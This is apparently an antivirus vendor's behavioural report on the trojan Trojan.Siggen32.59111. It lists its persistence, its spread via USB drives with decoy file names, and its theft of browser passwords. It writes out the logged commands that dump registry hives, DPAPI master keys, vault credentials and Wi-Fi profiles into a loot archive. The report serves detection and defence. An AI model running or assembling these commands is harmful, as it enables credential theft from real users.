Trojan.Siggen32.59111

Technical Information

To ensure autorun and distribution

Modifies the following registry keys

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run] 'RuntimeBroker' = '%APPDATA%\RuntimeBroker\RuntimeBroker.exe'

Creates or modifies the following files

<SYSTEM32>\tasks\runtimebroker task

Creates the following files on removable media

<Drive name for removable media>:\usb_driver.exe
<Drive name for removable media>:\delete.avi
<Drive name for removable media>:\split.avi
<Drive name for removable media>:\dial.bmp
<Drive name for removable media>:\tileimage.bmp
<Drive name for removable media>:\toolbar.bmp
<Drive name for removable media>:\dashborder_144.bmp
<Drive name for removable media>:\dashborder_96.bmp
<Drive name for removable media>:\dashborder_120.bmp
<Drive name for removable media>:\contoso.cer
<Drive name for removable media>:\contoso_1.cer
<Drive name for removable media>:\testee.cer
<Drive name for removable media>:\sdksampleunprivdeveloper.cer
<Drive name for removable media>:\testcertificate.cer
<Drive name for removable media>:\applicantform_en.doc
<Drive name for removable media>:\cveuropeo.doc
<Drive name for removable media>:\february_catalogue__2015.doc
<Drive name for removable media>:\weeklysheet1215.doc
<Drive name for removable media>:\hanni_umami_chapter.doc
<Drive name for removable media>:\glidescope_review_rev_010.docx
<Drive name for removable media>:\file_p_00000000_1371597592.docx
<Drive name for removable media>:\sdszfo.docx
<Drive name for removable media>:\thlps_keeper_mayer_1965.docx
<Drive name for removable media>:\adhd_and_obesity.docx
<Drive name for removable media>:\holycrosschurchinstructions.docx
<Drive name for removable media>:\winmine.exe
<Drive name for removable media>:\calc.exe
<Drive name for removable media>:\skypesetup.exe
<Drive name for removable media>:\chromesetup.exe
<Drive name for removable media>:\notepad.exe
<Drive name for removable media>:\64bit_notes.htm
<Drive name for removable media>:\about.htm
<Drive name for removable media>:\trivial-merge.htm
<Drive name for removable media>:\alert.htm
<Drive name for removable media>:\browse.htm
<Drive name for removable media>:\trivial-merge.html
<Drive name for removable media>:\howto-index.html
<Drive name for removable media>:\pushkin.jpeg
<Drive name for removable media>:\4f0bf7ff71f28.jpeg
<Drive name for removable media>:\1189.jpeg
<Drive name for removable media>:\13.jpeg
<Drive name for removable media>:\3.jpeg
<Drive name for removable media>:\13.jpg
<Drive name for removable media>:\1189.jpg
<Drive name for removable media>:\4f0bf7ff71f28.jpg
<Drive name for removable media>:\3.jpg
<Drive name for removable media>:\dag2_panel1_320_ref.mov
<Drive name for removable media>:\firefly1.mov
<Drive name for removable media>:\scan.mov
<Drive name for removable media>:\clip_480_5sec_6mbps_h264.mp4
<Drive name for removable media>:\video_1.mp4
<Drive name for removable media>:\2015-02-worms-nanoparticle-toxicity.pdf
<Drive name for removable media>:\2015-02-patients-topic-work-related-asthma-jobs.pdf
<Drive name for removable media>:\ff_ot_user_guide.pdf
<Drive name for removable media>:\lom602.pdf
<Drive name for removable media>:\7790_preview.pdf
<Drive name for removable media>:\investmentbankca_ca8.pem
<Drive name for removable media>:\server.pem
<Drive name for removable media>:\ck.pem
<Drive name for removable media>:\systisoft.pem
<Drive name for removable media>:\ck_ugo.pem
<Drive name for removable media>:\cbz.png
<Drive name for removable media>:\cleanlyrics.png
<Drive name for removable media>:\background.png
<Drive name for removable media>:\sim_gametheory_to_finance.ppt
<Drive name for removable media>:\proposaltemplates.ppt
<Drive name for removable media>:\ppswamp.ppt
<Drive name for removable media>:\metac.ppt
<Drive name for removable media>:\asaprojectcompetition.pptx
<Drive name for removable media>:\waterresourcesag.pptx
<Drive name for removable media>:\indogerman2010.pptx
<Drive name for removable media>:\middaugh_keynote.pptx
<Drive name for removable media>:\gruenspecht_02172016.pptx
<Drive name for removable media>:\digest.rdf
<Drive name for removable media>:\contenttypes.rdf
<Drive name for removable media>:\elvisimp.rdf
<Drive name for removable media>:\sioc.rdf
<Drive name for removable media>:\skos.rdf
<Drive name for removable media>:\20140114.rdf
<Drive name for removable media>:\router_manual.rtf
<Drive name for removable media>:\pubnet_855.rtf
<Drive name for removable media>:\myhrvoldhanssenbiharfamine.rtf
<Drive name for removable media>:\waterlandhealthkano.rtf
<Drive name for removable media>:\pandp.rtf
<Drive name for removable media>:\military_callsigns_0311.rtf
<Drive name for removable media>:\static_electricity_easy_and_quick_activities.rtf
<Drive name for removable media>:\flower_trans_matte.wmv
<Drive name for removable media>:\babyboymaintoscenesbackground.wmv
<Drive name for removable media>:\babyboymaintoscenesbackground_pal.wmv
<Drive name for removable media>:\passport_pal.wmv
<Drive name for removable media>:\price030215.xls
<Drive name for removable media>:\excel_example.xls
<Drive name for removable media>:\fiche_inscription_2015.xls
<Drive name for removable media>:\suspendedcompanies.xlsx
<Drive name for removable media>:\cee_mmsprogram_summary_public.xlsx
<Drive name for removable media>:\2013_finalsummaryforweb.xlsx
<Drive name for removable media>:\highly_cited_2001.xlsx
<Drive name for removable media>:\national_autism_preparation_programs.xlsx
<Drive name for removable media>:\al.xlsx
<Drive name for removable media>:\excel_example.zip
<Drive name for removable media>:\calculatorworksheet.zip
<Drive name for removable media>:\subjectclassification.zip
<Drive name for removable media>:\price030215.zip
<Drive name for removable media>:\price.zip
<Drive name for removable media>:\1sm_price.zip
<Drive name for removable media>:\usb drive [4gb].lnk

Malicious functions

Executes the following

'<SYSTEM32>\taskkill.exe' /f /im chrome.exe

Reads files which store third party applications passwords

%LOCALAPPDATA%\google\chrome\user data\default\login data
%LOCALAPPDATA%\microsoft\edge\user data\default\login data
%LOCALAPPDATA%\microsoft\edge\user data\default\web data
%LOCALAPPDATA%\google\chrome\user data\default\web data

Modifies file system

Creates the following files

%APPDATA%\runtimebroker\runtimebroker.exe
%TEMP%\v20_loot\system
nul
%TEMP%\v20_loot\security
%TEMP%\v20_loot\chrome\local state
%TEMP%\v20_loot\chrome\login data
%TEMP%\v20_loot.zip
%TEMP%\dbe3b0.tmp
%TEMP%\dbe42f.tmp
%TEMP%\db69c.tmp
%APPDATA%\runtimebroker\caqall.bat
%APPDATA%\runtimebroker\known.dat
%TEMP%\db7092.tmp
%TEMP%\db7094.tmp

Sets the 'hidden' attribute to the following files

%APPDATA%\runtimebroker\runtimebroker.exe
<Drive name for removable media>:\usb_driver.exe

Deletes following files that it created itself

%TEMP%\v20_loot.zip
%TEMP%\dbe3b0.tmp
%TEMP%\dbe42f.tmp
%TEMP%\db69c.tmp
%TEMP%\db7092.tmp
%TEMP%\db7094.tmp

Modifies the following files

%LOCALAPPDATA%\microsoft\vault\userprofileroaming\latest.dat

Network activity

Connects to

'di##ord.com':443
'ap#.#pify.org':443
'89.##8.118.221':443

TCP

Other

'di##ord.com':443
'ap#.#pify.org':443
'89.##8.118.221':443

UDP

DNS ASK di##ord.com
DNS ASK ap#.#pify.org

Miscellaneous

Searches for the following windows

ClassName: '' WindowName: ''

Creates and executes the following

'%APPDATA%\runtimebroker\runtimebroker.exe' migrated

Executes the following

'<SYSTEM32>\cmd.exe' /c reg save HKLM\SYSTEM "%TEMP%\V20_LOOT\SYSTEM" /y
'<SYSTEM32>\reg.exe' save HKLM\SYSTEM "%TEMP%\V20_LOOT\SYSTEM" /y
'<SYSTEM32>\cmd.exe' /c ping 127.0.0.1 -n 3 > nul & del /F /Q "<Full path to file>"
'<SYSTEM32>\cmd.exe' /c reg save HKLM\SECURITY "%TEMP%\V20_LOOT\SECURITY" /y
'<SYSTEM32>\ping.exe' 127.0.0.1 -n 3
'<SYSTEM32>\reg.exe' save HKLM\SECURITY "%TEMP%\V20_LOOT\SECURITY" /y
'<SYSTEM32>\cmd.exe' /c xcopy /Y /I /E "%APPDATA%\Microsoft\Protect" "%TEMP%\V20_LOOT\DPAPI_MasterKeys"
'<SYSTEM32>\xcopy.exe' /Y /I /E "%APPDATA%\Microsoft\Protect" "%TEMP%\V20_LOOT\DPAPI_MasterKeys"
'<SYSTEM32>\cmd.exe' /c taskkill /f /im chrome.exe >nul 2>&1
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoProfile -NonInteractive -Command "Compress-Archive -Path '%TEMP%\V20_LOOT\*' -DestinationPath '%TEMP%\V20_LOOT.zip' -Force"
'<SYSTEM32>\cmd.exe' /c rmdir /s /q "%TEMP%\V20_LOOT"
'<SYSTEM32>\cmd.exe' /c ver
'<SYSTEM32>\cmd.exe' /c dir /b "%PROGRAMFILES%" 2>nul
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoProfile -ExecutionPolicy Bypass
'<SYSTEM32>\cmdkey.exe' /list
'<SYSTEM32>\cmd.exe' /c netsh wlan show profiles
'<SYSTEM32>\netsh.exe' wlan show profiles
'<SYSTEM32>\cmd.exe' /c vaultcmd /listcreds:"Windows Credentials" /all 2>nul
'<SYSTEM32>\vaultcmd.exe' /listcreds:"Windows Credentials" /all
'<SYSTEM32>\cmd.exe' /c vaultcmd /listcreds:"Web Credentials" /all 2>nul
'<SYSTEM32>\vaultcmd.exe' /listcreds:"Web Credentials" /all
'<SYSTEM32>\cmd.exe' /c dir /s /b "%APPDATA%\Mozilla\Firefox\Profiles\*logins.json" 2>nul
'<SYSTEM32>\cmd.exe' /c wmic path SoftwareLicensingService get OA3xOriginalProductKey 2>nul
'<SYSTEM32>\wbem\wmic.exe' path SoftwareLicensingService get OA3xOriginalProductKey
'<SYSTEM32>\cmd.exe' /c dir /t:w /o-d /b "%USERPROFILE%\Desktop\*" 2>nul
'<SYSTEM32>\cmd.exe' /c dir /t:w /o-d /b "%USERPROFILE%\Downloads\*" 2>nul
'<SYSTEM32>\schtasks.exe' /create /tn "RuntimeBroker Task" /tr "\"%APPDATA%\RuntimeBroker\RuntimeBroker.exe\"" /sc onlogon /rl highest /f
'%APPDATA%\runtimebroker\runtimebroker.exe' migrated' (with hidden window)
'<SYSTEM32>\cmd.exe' /c reg save HKLM\SYSTEM "%TEMP%\V20_LOOT\SYSTEM" /y' (with hidden window)
'<SYSTEM32>\cmd.exe' /c ping 127.0.0.1 -n 3 > nul & del /F /Q "<Full path to file>"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c reg save HKLM\SECURITY "%TEMP%\V20_LOOT\SECURITY" /y' (with hidden window)
'<SYSTEM32>\cmd.exe' /c xcopy /Y /I /E "%APPDATA%\Microsoft\Protect" "%TEMP%\V20_LOOT\DPAPI_MasterKeys"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c taskkill /f /im chrome.exe >nul 2>&1' (with hidden window)
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoProfile -NonInteractive -Command "Compress-Archive -Path '%TEMP%\V20_LOOT\*' -DestinationPath '%TEMP%\V20_LOOT.zip' -Force"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c rmdir /s /q "%TEMP%\V20_LOOT"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c ver' (with hidden window)
'<SYSTEM32>\cmd.exe' /c dir /b "%PROGRAMFILES%" 2>nul' (with hidden window)
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoProfile -ExecutionPolicy Bypass' (with hidden window)
'<SYSTEM32>\cmdkey.exe' /list' (with hidden window)
'<SYSTEM32>\cmd.exe' /c netsh wlan show profiles' (with hidden window)
'<SYSTEM32>\cmd.exe' /c vaultcmd /listcreds:"Windows Credentials" /all 2>nul' (with hidden window)
'<SYSTEM32>\cmd.exe' /c vaultcmd /listcreds:"Web Credentials" /all 2>nul' (with hidden window)
'<SYSTEM32>\cmd.exe' /c dir /s /b "%APPDATA%\Mozilla\Firefox\Profiles\*logins.json" 2>nul' (with hidden window)
'<SYSTEM32>\cmd.exe' /c wmic path SoftwareLicensingService get OA3xOriginalProductKey 2>nul' (with hidden window)
'<SYSTEM32>\cmd.exe' /c dir /t:w /o-d /b "%USERPROFILE%\Desktop\*" 2>nul' (with hidden window)
'<SYSTEM32>\cmd.exe' /c dir /t:w /o-d /b "%USERPROFILE%\Downloads\*" 2>nul' (with hidden window)
'<SYSTEM32>\schtasks.exe' /create /tn "RuntimeBroker Task" /tr "\"%APPDATA%\RuntimeBroker\RuntimeBroker.exe\"" /sc onlogon /rl highest /f' (with hidden window)

Tecnologie

Termini

Formazione ed informazione

Falsi miti

Technical Information

Curing recommendations

Free trial